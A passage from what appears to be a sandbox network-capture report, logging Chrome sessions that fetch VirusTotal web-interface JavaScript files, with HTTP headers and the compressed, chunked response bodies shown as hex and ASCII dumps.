                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 4f 94 2c 44 44 c2 c9 b0 23 0d 1e 95 82 a2 25 a7 1a 7d bb 07 64 32 2a 6e 20 06 50 7a 21 9b 48 6a c9 70 fd 1b f2 94 d5 59 b1 c7 8f 23 ba 8e c4 cd f8 26 4a 16 e9 8d 37 db cd e0 ce e5 e3 0f 3a 1e cc da 5c c4 e4 ed e2 db c1 9d a8 1c 0a c4 a1 21 7d a0 89 4c d3 d0 7e 41 9f da 01 08 20 57 8f bc 48 f0 09 3d 31 c9 82 6d 46 26 b3 f8 42 2c c3 5d 5c b4 75 a0 21 38 50 6b eb 75 65 6e 8a 23 0f ad 09 f8 4b 6e af 2e 9e 4b 44 c6 e2 6d 07 a9 02 a8 19 92 1e b3 d8 7d 1a 80 d3 66 82 96 cf a0 61 28 2e 24 63 26 4c 50 c8 ca 48 7d 0d e0 63 c1 ed 53 73 2b f9 31 c1 e6 a3 96 03 7b 1d d9 f9 07 bc 30 e9 cc 72 61 52 98 92 7d d4 51 a6 c4 54 bb 0c c6 b2 f8 8e 9d 58 af e0 5c cc 57 b0 f9 5f 20 cb d1 46 06 ae a0 74 1c fc df b6 92 39 8d 38 69 04 10 18 6a 20 6f 97 5e 05 d4 ec 07 9c 13 ab b6 15
                                                                                                                                                                                                                    Data Ascii: O,DD#%}d2*n Pz!HjpY#&J7:\!}L~A WH=1mF&B,]\u!8Pkuen#Kn.KDm}fa(.$c&LPH}cSs+1{0raR}QTX\W_ Ft98ij o^
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC335INData Raw: ce 37 2f bf b3 16 c0 cd e4 6e c6 53 17 37 b3 fc 89 59 ed 09 ee 8f 67 4f 28 5d f4 e4 eb 97 2f be fc fd 9b 2f 79 e9 27 e3 0c f8 ec 25 73 e2 34 c7 ce 87 9d d9 c5 62 11 4e b8 09 99 d3 68 95 a2 71 30 e8 76 96 3d d9 b8 dd 65 70 4b a9 71 79 d1 9b 77 55 23 c2 68 1a cc 7f 64 13 b8 08 2d f3 7e ef a2 d7 91 2d 28 1f 03 ff a0 51 f4 87 e7 1d d5 78 27 e2 38 bd 41 e3 72 2e 46 83 a1 84 a4 98 1d e2 f0 e1 f9 28 9c 5f cc 65 5b 21 c2 18 4d bd ce 7c 34 52 60 f3 bb 90 a0 7a 97 c3 d9 ac 2f a1 70 e5 3d 57 98 c8 86 9b 35 78 91 a6 5f 2e f5 dc 24 fe d8 12 fd 29 9b 7c dc 38 d3 c0 73 fe 63 b5 77 3b 1d 1a 3e a2 1f ab b9 27 9b 7b 4b fc 58 cd d8 17 a0 c5 80 7e ac e6 0b 6e 9e f3 1f ab b9 cf cd b3 73 fa b1 9a 07 dc dc c0 70 c8 cd 17 0b fa b1 a0 2f b9 b9 81 f7 88 9b bb 21 fd 48 68 25 60 c0
                                                                                                                                                                                                                    Data Ascii: 7/nS7YgO(]//y'%s4bNhq0v=epKqywU#hd-~-(Qx'8Ar.F(_e[!M|4R`z/p=W5x_.$)|8scw;>'{KX~nsp/!Hh%`
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a e7 0d 0a 30 30 30 30 30 30 30 31 0d 0a a8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 89 0d 0a 30 30 30 30 30 30 30 31 0d 0a 89 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 73 0d 0a 30 30 30 30 30 30 30 31 0d 0a 84 0d 0a 30 30 30 30 30 30 30 31 0d 0a 69 0d 0a 30 30 30 30 30 30 30 31 0d 0a cf 0d 0a 30 30 30 30 30 30 30 31 0d 0a 07 0d 0a 30 30 30 30 30 30 30 31 0d 0a f8 0d 0a 30 30 30 30 30 31 0d 0a
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000000100000001^000000010000000100000001Z00000001s0000000100000001i000000010000000100000001000001
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 41 11 94 bb 57 8f 05 01 94 8b 5f 51 2b 45 8f 1e ed 91 5d 5a 45 c9 b8 23 b7 a6 f6 af a9 55 6e 57 b7 80 0d 84 af 32 62 1a 57 35 13 93 96 f5 35 71 3d 70 c0 a1 bf e5 c7 34 24 c0 bb bd 4a 78 a9 7c 97 42 d9 7b cb 75 0d 0a 46 7d e3 9a b1 77 ea 0b 5f 8e 15 ef f6 3e 1e d0 bc 8a 0a 9f 6a 11 42 d8 05 b8 89 72 94 de 3c 31 c9 58 d7 00 bb d5 89 25 4d ea 9d 72 9d e3 7d 6a d9 5a 67 7d 13 e3 31 e4 ef 27 14 e6 90 ea 8a 50 6b 9d ed b7 28 01 27 c9 ed 4c d4 21 f1 83 61 92 20 00 57 bb 40 1d 03 3c e2 8d f0 21 d3 05 1e 2c 40 2d 60 ce bc 81 c4 ae 77 0a 8c 68 7c b2 73 13 25 bb 42 9c ec 5e c3 55 97 eb 9c 04 59 84 f4 88 03 30 39 09 01 1f bc 58 3f 00 73 47 ce 38 4f 53 92 e2 50 ee 88 89 e4 e7 5b 54 35 29 ce 51 fc 44 cf 58 59 70 ea da a1 d4 23 c7 18 80 b9 ac 9c 5b aa 94 fc 86 aa 20 35
                                                                                                                                                                                                                    Data Ascii: AW_Q+E]ZE#UnW2bW55q=p4$Jx|B{uF}w_>jBr<1X%Mr}jZg}1'Pk('L!a W@<!,@-`wh|s%B^UY09X?sG8OSP[T5)QDXYp#[ 5
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: ce a2 b2 00 ab 64 90 ba 2d f9 ac 94 1b 98 2e 39 e9 e8 a2 3b 53 05 01 e5 a8 fa d4 a3 73 11 aa 3a 22 02 aa 1b c0 b1 73 c1 b7 f6 a8 1d e8 f5 d4 dd 3c c1 d9 0c 5b c7 c1 30 28 a1 5e 9b 5f f7 59 54 25 a8 cb f3 30 6c ce fe b7 de b7 02 2f 73 16 47 89 6d 7a 8f 52 bd ec ad 61 c7 e4 67 95 55 7f c1 5b f3 70 eb 67 55 a7 f7 fb 1d e5 d1 51 0f 4c dd 3c 4a eb 3e b6 74 92 1e 7d 92 35 1c 4e 9c e4 71 a8 5f e2 24 eb 94 2d 8f eb 94 ff 5b 42 1c 3b 50 49 02 5d b8 24 6b c3 71 c8 f4 7e 35 75 ac f4 b1 f4 dc e8 c2 7b 40 97 8c 52 a0 2b 9d 1c 1d 9c d7 3a 8d af 36 ee 04 7c 3b 69 0d b4 d3 eb 8e a9 d5 e5 c5 a5 6e ab f8 eb 48 b2 92 ba b2 c6 ab b3 7f c8 13 07 05 1e e3 b8 56 f7 62 bb ae 95 9e db e3 6e 29 c3 98 cd 9e 72 4c 4b a8 63 ae 69 b7 e1 82 32 bc 32 fd 7c bd 59 71 42 65 0d 9d ac 57 c3
                                                                                                                                                                                                                    Data Ascii: d-.9;Ss:"s<[0(^_YT%0l/sGmzRagU[pgUQL<J>t}5Nq_$-[B;PI]$kq~5u{@R+:6|;inHVbn)rLKci22|YqBeW
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC118INData Raw: 6b 06 98 ba 94 4d 34 73 eb 94 9a f6 d9 4a f7 cb 9e 9a 9c b6 81 63 b3 49 63 31 db fb b0 cf ac 44 a7 4c 27 95 6d 3a 49 47 56 ab 9c d2 24 d1 1a 1c 70 64 07 06 f8 e1 83 28 1f 75 c1 3c e5 b8 d3 87 51 c2 c0 40 93 2d 7b 30 19 6b 88 ad c8 67 1d fd 3d 14 aa 9f ca 09 1e 94 6e b4 35 a5 66 96 1a c1 8f 4f 77 cf fa 7a 1e 6b ea bf 9f 31 0c f1 ea a7 d8 24 8d 01 0d 0a
                                                                                                                                                                                                                    Data Ascii: kM4sJcIc1DL'm:IGV$pd(u<Q@-{0kg=n5fOwzk1$
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC713INData Raw: 30 30 30 30 30 30 30 31 0d 0a a5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 33 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6c 0d 0a 30 30 30 30 30 30 30 31 0d 0a e4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 89 0d 0a 30 30 30 30 30 30 30 31 0d 0a 88 0d 0a 30 30 30 30 30 30 30 31 0d 0a ee 0d 0a 30 30 30 30 30 30 30 31 0d 0a 25 0d 0a 30 30 30 30 30 30 30 31 0d 0a c4 0d 0a 30 30 30 30 30 30 30 31 0d 0a f1 0d 0a 30 30 30 30 30 30 30 31 0d 0a d3 0d 0a 30 30 30 30 30 30 30 31 0d 0a d2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 73 0d 0a 30 30 30 30 30 30 30 31 0d 0a f2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 29 0d 0a 30 30 30 30 30 30 30 31 0d 0a 35 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 31 0d 0a bf 0d 0a 31 64 64 0d 0a ea fc 5e 47 a9 a9 5a ac fd 9b 33 25 44 ee 21 d5 71 cc 68 90 99
                                                                                                                                                                                                                    Data Ascii: 0000000100000001300000001l0000000100000001000000010000000100000001%0000000100000001000000010000000100000001s0000000100000001)000000015000000010011dd^GZ3%D!qh
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    82192.168.2.164980674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC554OUTGET /gui/30578.8f26f81ecad64b338ebc.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 74e7cc8b9b1cc7a7e68acc0393d0f441
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:49:35 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:49:35 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36342
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 31 0d 0a ff 0d 0a 30 66 66 36 0d 0a ec bd 79 7f 23 c7 75 ef fd ff 7d 15 2d d8 56 08 1b c0 00 8d 9d 14 47 96 29 39 a3 44 13 3b 92 ac dc 58 d1 e3 80 44 93 44 44 02 0c 00 ce 22 0e df fb f3 fd 9d 53 d5 0b 16 0e 25 cb 59 ee 87 51 3c 44 75 55 d7 72 f6 73 ea 54 f5 c1 2a bb 3a 6f bd ce 4e 6f 26 67 df 9f 5c de ce bf 7f b5 fe cb ed ec 2f d7 93 d9 fc f8 81 ba 77 ef be fd ae de ba b9 5d 5d 1e 7c fb 6d b7 dd 1f 8e 1a c3
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001010ff6y#u}-VG)9D;XDDD"S%YQ<DuUrsT*:oNo&g\/w]]|m
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 d2 81 64 8f 03 cf 51 53 6e f8 d5 ed c5 45 b6 12 6f 03 c2 fb 7a bd e5 4c eb ef 50 be 7f 3d bb ba fa 93 61 54 34 91 b5 2e 27 ab 83 da 0e 40 d4 20 5c 47 e3 36 90 4e 2e 27 f3 8b 6c 1a d0 bc 5d df c8 c4 9d 7b ba ad 53 6b 83 1a 2e f2 61 de b7 94 65 46 fb d5 5a 58 2a 30 11 88 bb 7e 77 d5 fa c3 ef 91 38 4e 5d 07 b5 cb c5 75 56 6b d4 9c 3c 9f 9d 0b 53 b5 86 68 70 c7 42 e3 62 90 fe f5 bb 0f a0 de 65 58 f8 2a 5b ff b3 c8 e5 a0 56 0b d4 b3 98 1b a9 57 51 9c bf 8f 18 8c 6f 00 59 09 06 b8 dc a8 36 f0 f6 c1 32 97 7c bf 86 30 d7 81 1a 25 2a 6f ae 26 67 d9 c1 b3 7f 9b 3f bb 68 d4 12 c6 7b 3b cb ae 10 ae 2d 07 cb 49 20 2e b4 50 89 e5 c4 68 e5 72 60 c1 d0 2f 0c 17 85 5c 64 26 9b 0c 73 ca a5 6c 2e 74 b2 d7 49 90 db 07 07 f9 5b 92 d8 b6 8e f9 f1 b2 35 b9 b9 b9 7a 8b 00 5c
                                                                                                                                                                                                                    Data Ascii: 0dQSnEozLP=aT4.'@ \G6N.'l]{Sk.aeFZX*0~w8N]uVk<ShpBbeX*[VWQoY62|0%*o&g?h{;-I .Phr`/\d&sl.tI[5z\
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: b1 2f 27 37 f5 83 bb e8 0a ba 44 2b 45 b1 ee f3 60 41 81 cc 1f f3 76 44 e9 f6 1c b6 51 7c 0e 8a cf 41 71 05 71 e8 7f bc bc c5 bc 69 86 fc ec 55 96 bc 6e 76 da ed 80 5e c0 68 98 4d 66 d3 e3 10 20 b1 75 46 c4 08 61 b5 88 55 0b 0b 22 4b d6 68 c9 04 4a 80 d4 a6 4d 08 ae d9 4e 6e 56 cd 6e 72 93 35 fb 49 3e de e4 94 88 2f 5c 5e 4b 2c 9c e1 bc 7d 5c 0b e0 a7 2f c3 eb aa 91 10 fe b9 24 76 96 4c 17 0a dd f3 e3 f3 3f f2 cf 9f be fc 82 7f af 27 57 af 91 23 c9 f9 e4 7a 76 35 53 2b e2 05 d9 64 9d 4c 14 cf a3 78 f2 cd 67 84 39 09 b6 13 55 5e aa f9 ec 4c f6 72 b2 38 5d 65 cb 57 66 c9 ad 36 e8 2a f9 ed 29 de 4d 20 b2 e4 b7 38 17 0a f8 e5 65 83 47 2c 05 8d ee 1c 91 7c 1c d1 1c ab cb b2 f4 b8 b6 38 3f af 25 ab 9b ec ea ea ec 32 13 19 9f 4f 08 0c d7 12 b5 b2 68 64 41 b4 55
                                                                                                                                                                                                                    Data Ascii: /'7D+E`AvDQ|AqqiUnv^hMf uFaU"KhJMNnVnr5I>/\^K,}\/$vL?'W#zv5S+dLxg9U^Lr8]eWf6*)M 8eG,|8?%2OhdAU
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC350INData Raw: db b0 7b e2 4e 6c d8 76 61 a4 93 c5 7c 6a ce 7c 8c 3c 9b cd e9 aa 3a ca 82 30 29 b6 44 cd 03 de f5 b2 c5 d7 2a d6 47 78 89 4c a8 00 3d a2 6b a1 81 0d 11 03 5d 1b 83 84 e0 6c 0e 96 d0 f6 2f ec 2c 5b 48 6d 55 99 27 0b ae 94 63 c0 a1 56 ec b4 a0 98 2d e1 ab 45 0c d1 2c 94 96 d9 e6 c7 c7 96 d1 c1 06 64 4c 19 fa d3 f2 2a e4 75 d4 8f 94 a5 91 6f a5 04 e8 e6 7d ef 04 4e 3e ef b8 5c ed 32 7e f8 21 09 1b 5f cf ae 33 82 56 6e 13 dd 2d 5d 87 23 85 be 32 3b d8 24 a6 65 4d 85 54 93 65 d8 86 df 68 11 53 8f ea f5 2a 15 16 46 5f 80 d4 34 4f c2 da 1f d3 0b db 50 8b e3 ec 37 07 cb 8f 6b cf 6a bf 21 d8 0a cc 0c 24 9e 58 20 68 ec 87 50 63 91 db 2f bb 02 83 5f 83 96 af 8f ff 50 8d 1a c1 09 ec 16 b1 c5 94 dc ac 9b fd 10 2c 8a 16 89 02 7f 38 21 c9 b5 5b c3 d7 b4 48 5e 15 91 c4
                                                                                                                                                                                                                    Data Ascii: {Nlva|j|<:0)D*GxL=k]l/,[HmU'cV-E,dL*uo}N>\2~!_3Vn-]#2;$eMTehS*F_4OP7kj!$X hPc/_P,8![H^
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a fb 0d 0a 30 30 30 30 30 30 30 31 0d 0a af 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 0f 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a 10 0d 0a 30 30 30 30 30 30 30 31 0d 0a ee 0d 0a 30 30 30 30 30 30 30 31 0d 0a d9 0d 0a 30 30 30 30 30 30 30 31 0d 0a cd 0d 0a 30 30 30 30 30 30 30 31 0d 0a e4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 94 0d 0a 30 30 30 30 30 30 30 31 0d 0a 60 0d 0a 30 30 30 30 30 30 30 31 0d 0a d4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 70 0d 0a 30 30 30 66 66 31 0d 0a d4 c7 85 8f b6 db 12 0d 8b ac 98 ae cf 4f 14 1d 32 f7 0f b3 d4 e8 dd 68 5d f6 69 43 b1 2c 69 4b f3 c3 2c 66 b9 5a 61 a9 af 8a 81 72 3f 75 af 33 f8 aa db 6a
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001?000000010000000100000001000000010000000100000001000000010000000100000001`000000010000000100000001p000ff1O2h]iC,iK,fZar?u3j
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 24 4e 93 86 bd 30 11 57 b1 b7 ac 23 47 ab e4 1a 43 92 dd 6b b6 d4 27 c9 16 4b 1c d4 93 eb 6c 7d b9 98 b6 6a f5 7b 32 94 23 c7 45 8c dd 85 5c c8 e5 bb 77 cb e7 59 20 49 91 2b f9 ec b1 74 74 1e ce 14 ad 8f 09 b9 1e 6b 81 ce cf d0 ed fa a3 e5 d1 fa 37 bf a9 2f be 5d 7f c7 d1 a2 f5 77 c1 e8 4a 16 76 ac ea 3c 7b 0a 70 fd 0c e7 aa 8c 01 92 b7 99 c1 fe cb ec e2 b3 37 37 07 cf 2e 0f d6 eb 77 6f de d4 6f 56 1f 1f 1c fe db b3 7f 7b f6 ee 57 dd c9 af d2 73 fe bf fe 8c 33 72 af 33 c2 50 1e 7d 52 18 6a c9 29 aa 18 68 f0 38 d4 49 b6 11 85 fa cf d6 ef ee 94 5e ed d1 17 42 9d 79 f6 77 a0 fd 18 b3 af 9c 7b a2 dd 67 57 c8 8e 3c 3d 93 1c d7 a2 21 7b 11 76 b0 e7 24 9c 16 a9 34 8c 09 b6 ec 00 e8 34 5e b1 05 e4 fe d6 97 ec c8 fa 79 94 af 2c ff 56 fc 14 a2 c6 16 87 c5 31 53 90
                                                                                                                                                                                                                    Data Ascii: $N0W#GCk'Kl}j{2#E\wY I+ttk7/]wJv<{p77.wooV{Ws3r3P}Rj)h8I^Byw{gW<=!{v$44^y,V1S
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: ab 48 01 f3 c9 ab 84 ff 35 45 a2 f6 c3 89 6a 96 4d c3 21 89 b0 3b 43 fd d5 8c b3 4c 71 a7 ed 2a df a4 d1 db 84 88 f2 44 53 76 6b ba 7e 3e 86 a3 32 af 49 d7 2f 69 d7 66 be c9 13 c8 fb 8a fd 9c 8f 9e dd 5e 3d 57 82 9e c7 e2 5a b8 b4 64 56 ae 0e ee dc 5f 3d b4 c4 9a 5a e3 76 49 48 16 be ae 11 1f 96 19 76 48 e4 4d 7f 6b f7 75 df 97 53 22 a3 6b 2d 8b 0b 13 96 5e 1f 2f bf 6d 7f 47 28 73 f9 6d 27 06 87 4a 20 59 0b 24 eb 00 92 ed 05 b1 56 b6 94 74 79 40 d3 3c e3 28 c3 03 f1 6b dd a2 77 df 7a 94 e8 8e 79 5a c0 aa 56 49 ce ac 6c 70 19 7b 68 f9 82 79 0e 4f db c0 7a 26 70 88 5c b6 f2 89 39 eb c1 b9 95 aa 23 42 c8 12 13 7a e7 fe 8b 66 c3 95 2e dc ba a4 3b 86 d8 a3 de f0 26 ca 5a 6b 21 28 2c 02 14 f2 4c d3 28 a5 de e8 54 54 75 fe bf ad 9e 50 0a 98 64 03 8e 99 ff 24 3d
                                                                                                                                                                                                                    Data Ascii: H5EjM!;CLq*DSvk~>2I/if^=WZdV_=ZvIHvHMkuS"k-^/mG(sm'J Y$Vty@<(kwzyZVIlp{hyOz&p\9#Bzf.;&Zk!(,L(TTuPd$=
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC62INData Raw: d0 cd 1c 3e 0b 23 98 37 69 bd 79 aa de f7 d9 f1 49 76 ef 57 34 3f ee 52 66 9f 58 b0 ab ec 6e d9 09 37 33 2b 38 b2 08 fb b0 13 1d 61 24 7f cf 2e 67 6e ad 5e 5d d4 0f 16 10 e1 e2 58 0d 0a
                                                                                                                                                                                                                    Data Ascii: >#7iyIvW4?RfXn73+8a$.gn^]X
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a e7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 41 0d 0a 30 30 30 30 30 30 30 31 0d 0a b3 0d 0a 30 30 30 30 30 30 30 31 0d 0a fa 0d 0a 30 30 30 30 30 30 30 31 0d 0a bf 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 78 0d 0a 30 30 30 30 30 30 30 31 0d 0a 96 0d 0a 30 30 30 30 30 30 30 31 0d 0a bc 0d 0a 30 30 30 30 30 30 30 31 0d 0a b9 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9a 0d 0a 30 30 30 30 30 30 30 31 0d 0a af 0d 0a 30 30 30 30 30 30 30 31 0d 0a fc 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 38 0d 0a 30 30 30 30 31 0d 0a 5b 0d 0a 30 66 65 64 0d 0a 5c 8a a7 bd ee
                                                                                                                                                                                                                    Data Ascii: 0000000100000001A00000001000000010000000100000001000000010000000100000001x0000000100000001000000010000000100000001000000010000000100000001\00000001800001[0fed\
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 66 2d fc 80 35 7a 29 6b 41 18 48 06 75 25 46 fb fc 31 4e 2a e4 a8 00 83 50 b6 49 23 5c 4c d7 48 84 b6 07 25 45 50 9d be e0 23 24 76 90 a1 bd 31 f3 e9 c3 ab 9a 1c 43 20 f3 7a e0 5f 3d 99 10 ed 0d 3b 92 a2 dd 49 1f 75 95 76 92 f0 c7 41 d5 1a 42 05 88 ac 74 fc b2 09 96 da fd 01 f3 1d f5 7b 48 d1 21 d2 8b df 5a c0 78 68 0b 48 e9 76 00 e6 b4 b2 71 7f 34 01 7a e3 01 ef fb 1f eb 90 c6 bd 14 e5 db e9 21 60 c0 10 e4 41 75 6f 3c 96 bc ed 30 7a f8 63 30 4e 10 21 40 b1 d7 93 64 31 c1 32 01 78 5c 2a 20 82 d5 1f 9f a3 64 96 d1 70 a7 bb 17 20 50 72 1f da d2 aa c7 23 c4 53 17 82 a6 53 13 e7 a8 56 80 25 15 20 2d de 31 6d 1f 04 a9 96 de 14 55 0d 25 4d 21 78 48 4c ef 42 a9 63 a1 8c 85 4f e8 7a 0c 40 c3 1f 9b b8 70 0c 70 7b 08 eb ae e4 68 17 55 03 b1 0e 7a 67 bc d9 eb 83 cf
                                                                                                                                                                                                                    Data Ascii: f-5z)kAHu%F1N*PI#\LH%EP#$v1C z_=;IuvABt{H!ZxhHvq4z!`Auo<0zc0N!@d12x\* dp Pr#SSV% -1mU%M!xHLBcOz@pp{hUzg


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    83192.168.2.164980774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC665OUTGET /gui/vt-ui-shell-extra-deps.dd2c31d5f5a0bc61bbe0.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 07689a84affe6b6be31d22be2fa13cbc
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 12:40:49 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 12:40:49 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 544468
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 66 66 38 0d 0a 02 ff ec 5c 69 7b db 46 92 fe 9e 5f d1 42 12 3f c0 04 80 48 ea b2 49 43 8a 23 db 13 65 e5 d8 63 d9 b9 14 ad 0c 12 4d 12 11 08 30 00 a8 c3 34 f7 b7 ef 5b 7d e0 20 20 c9 f6 64 76 bf 64 9e 8c 05 a2 af ea ea ba ab 1a c6 22 e3 2c cb d3 70 94 1b 03 33 e3 d1 d8 bd e2 c3 b9 3f ba 38 9c 2e e2 8b cb fc 7c 11 9e cf fc 30 f6 ee 68 fb f0 e1 f4 cc 72 e7 8b 6c 6a 9e 9e ee 6d 3f ea f6 ec 87 db bb 7b 7b 76 0f ff db 3a b3 97 7b dd ad 9d ed be c9
